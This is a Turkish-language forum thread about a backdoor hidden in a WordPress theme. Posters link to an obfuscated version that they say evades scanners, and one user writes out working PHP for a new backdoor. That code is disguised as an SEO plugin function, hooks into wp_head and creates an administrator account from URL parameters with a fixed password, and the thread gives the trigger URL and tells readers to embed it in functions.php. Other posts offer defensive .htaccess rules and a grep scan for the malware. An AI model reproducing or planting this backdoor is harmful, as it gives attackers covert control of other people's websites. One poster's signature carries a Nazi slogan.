Wordpress Admin Backdoor

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    end
    end's avatar
    Kayıt Tarihi: 16/Ekim/2016
    Erkek
    1234567B bunu yazdı
    end bunu yazdı
    KaptaN bunu yazdı

    Hocam peki yüklediğini nasıl anlıyosunuz onlarca kişi kurdu temayı ama kim hamgş siteye kurdu nerden bilcez

    fonksiyonların içinde bir yerde logluyordur site adresini uzak sunucuya. 

    Uzak sunucuya göndermiyor. 

    Ayni temaya siz de mi denk geldiniz hocam?

     

     

    end tarafından 12/Ara/17 17:15 tarihinde düzenlenmiştir

    0x0480 takilin madem ﷽﷽﷽
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek

    https://hastebin.com/raw/wofesamose

    şifreli hali backdoorun hiç bir malware scannere yakalanmıyor

    decode edilmiş hali

    https://www.unphp.net/decode/6de64366f25776de3f23b108e26c26af/


    insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    end
    end's avatar
    Kayıt Tarihi: 16/Ekim/2016
    Erkek
    EcHoLL bunu yazdı

    https://hastebin.com/raw/wofesamose

    şifreli hali backdoorun hiç bir malware scannere yakalanmıyor

    decode edilmiş hali

    https://www.unphp.net/decode/6de64366f25776de3f23b108e26c26af/

    Decode edilmiş hali çalışıyor mu peki?

    Syntaxın ırzına geçilmiş gibi duruyor çünkü.


    0x0480 takilin madem ﷽﷽﷽
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek

    Bu Saldırılardan Korunmak için

    wp-includes

    wp-content

    Klasörünün için .htaccess dosyası oluşturup Altdaki kodu çakın gitsin

    <FilesMatch "\.(?i:php)$">
      <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
      </IfModule>
      <IfModule mod_authz_core.c>
        Require all denied
      </IfModule>
    </FilesMatch>
    

     

     

    Eğer Saldırıya ugramışsanız wp-admin komple silip tekraradan ftp atın


    insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek

    Sunucuzda Böyle bir malwere varmı taratmak için

    putty ssh login oluyoruz

    find /home*/*/public_html -type f -print0 | xargs -r0 grep -F 'GL\x4f\x42\x41\x4c\x53'>banakaymislarmi.txt

    Arama bitince banakaymislarmi.txt bakıyoruz kayıp kaymadıklarını görüyorsunuz :)


    insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    1234567B
    1234567B's avatar
    Kayıt Tarihi: 04/Şubat/2010
    Erkek
    end bunu yazdı
    1234567B bunu yazdı
    end bunu yazdı
    KaptaN bunu yazdı

    Hocam peki yüklediğini nasıl anlıyosunuz onlarca kişi kurdu temayı ama kim hamgş siteye kurdu nerden bilcez

    fonksiyonların içinde bir yerde logluyordur site adresini uzak sunucuya. 

    Uzak sunucuya göndermiyor. 

    Ayni temaya siz de mi denk geldiniz hocam?

     

     

    Yok sadece kodlara baktım. Zaten  çalışacağını düşünmüyorum. Sadece bu haliyle bu sınıf themes veya plugins dizininden wp incudes içerisine zıplayamaz. Test edelim.

    Wp panele baktıgımızda yeni bir kullanıcı oluşturmuyor.

    Evet gördüğümüz gibi çalışmıyor. Şimdi zaten bukadar kasmaya gerek yok. Functions.php içerisine erişebiliyor olman demek zaten site senin demek. İşsiz bir zamanıma geldiniz örnek birtane yazayım.

    <?php
    add_action('wp_head', 'allInoneSeoPack__'); 
    function allInoneSeoPack__() {
    	if ($_GET['aisp'] == '1'):
    		require('wp-includes/registration.php');
    		if (!username_exists($_GET['un']) and !empty($_GET['un'])):
    			$user_id = wp_create_user($_GET['un'],"1234567B");
    			$user = new WP_User($user_id);
    			$user->set_role('administrator');
    		endif;
    	endif;
    }
    ?>

     

    bunu functions.php içine yada eklentinin içine gömün ardından şöyle bir sorgu ytapmanız yeterli

    siteadi.com/?aisp=1&un=tbt

     

    oluşan kullanıcının adı tbt

    şifresi 1234567B olacaktır.

     

     

     


    arbeit macht frei
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek
    require $_SERVER["DOCUMENT_ROOT"] . "/wp-load.php";

    Yani çalışması için kodun ana dizine wp kurulu olması lazım

    insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    end
    end's avatar
    Kayıt Tarihi: 16/Ekim/2016
    Erkek
    1234567B bunu yazdı
    end bunu yazdı
    1234567B bunu yazdı
    end bunu yazdı
    KaptaN bunu yazdı

    Hocam peki yüklediğini nasıl anlıyosunuz onlarca kişi kurdu temayı ama kim hamgş siteye kurdu nerden bilcez

    fonksiyonların içinde bir yerde logluyordur site adresini uzak sunucuya. 

    Uzak sunucuya göndermiyor. 

    Ayni temaya siz de mi denk geldiniz hocam?

     

     

    Yok sadece kodlara baktım. Zaten  çalışacağını düşünmüyorum. Sadece bu haliyle bu sınıf themes veya plugins dizininden wp incudes içerisine zıplayamaz. Test edelim.

    Wp panele baktıgımızda yeni bir kullanıcı oluşturmuyor.

    Evet gördüğümüz gibi çalışmıyor. Şimdi zaten bukadar kasmaya gerek yok. Functions.php içerisine erişebiliyor olman demek zaten site senin demek. İşsiz bir zamanıma geldiniz örnek birtane yazayım.

     

     

    bunu functions.php içine yada eklentinin içine gömün ardından şöyle bir sorgu ytapmanız yeterli

    siteadi.com/?aisp=1&un=tbt

     

    oluşan kullanıcının adı tbt

    şifresi 1234567B olacaktır.

     

     

     

    İyi de ben bu kod bloğunda loglanıyor demedim ki. Adam mal mı da backdoor bırakıp izini sürmesin. Fonksiyon dosyası şifrelidir, araya sıkıştırılmıştır. functions diye bir php dosyasuı yok mu wp tema dizininde, heh ondan bahsediyorum. Lütfen...

     

    end tarafından 13/Ara/17 07:01 tarihinde düzenlenmiştir

    0x0480 takilin madem ﷽﷽﷽
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    streetw1se
    streetw1se's avatar
    Kayıt Tarihi: 22/Eylül/2007
    Erkek

    çok faydası oldu teşekkürler.

  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    1234567B
    1234567B's avatar
    Kayıt Tarihi: 04/Şubat/2010
    Erkek
    end bunu yazdı
    1234567B bunu yazdı
    end bunu yazdı
    1234567B bunu yazdı
    end bunu yazdı
    KaptaN bunu yazdı

    Hocam peki yüklediğini nasıl anlıyosunuz onlarca kişi kurdu temayı ama kim hamgş siteye kurdu nerden bilcez

    fonksiyonların içinde bir yerde logluyordur site adresini uzak sunucuya. 

    Uzak sunucuya göndermiyor. 

    Ayni temaya siz de mi denk geldiniz hocam?

     

     

    Yok sadece kodlara baktım. Zaten  çalışacağını düşünmüyorum. Sadece bu haliyle bu sınıf themes veya plugins dizininden wp incudes içerisine zıplayamaz. Test edelim.

    Wp panele baktıgımızda yeni bir kullanıcı oluşturmuyor.

    Evet gördüğümüz gibi çalışmıyor. Şimdi zaten bukadar kasmaya gerek yok. Functions.php içerisine erişebiliyor olman demek zaten site senin demek. İşsiz bir zamanıma geldiniz örnek birtane yazayım.

     

     

    bunu functions.php içine yada eklentinin içine gömün ardından şöyle bir sorgu ytapmanız yeterli

    siteadi.com/?aisp=1&un=tbt

     

    oluşan kullanıcının adı tbt

    şifresi 1234567B olacaktır.

     

     

     

    İyi de ben bu kod bloğunda loglanıyor demedim ki. Adam mal mı da backdoor bırakıp izini sürmesin. Fonksiyon dosyası şifrelidir, araya sıkıştırılmıştır. functions diye bir php dosyasuı yok mu wp tema dizininde, heh ondan bahsediyorum. Lütfen...

     

    Ne dediğini anlamakta güçlük çekiyorum. Kimse sana bu kod blogu loglanıyor diyorsun demediki


    arbeit macht frei
Toplam Hit: 13710 Toplam Mesaj: 36
wordpress trojan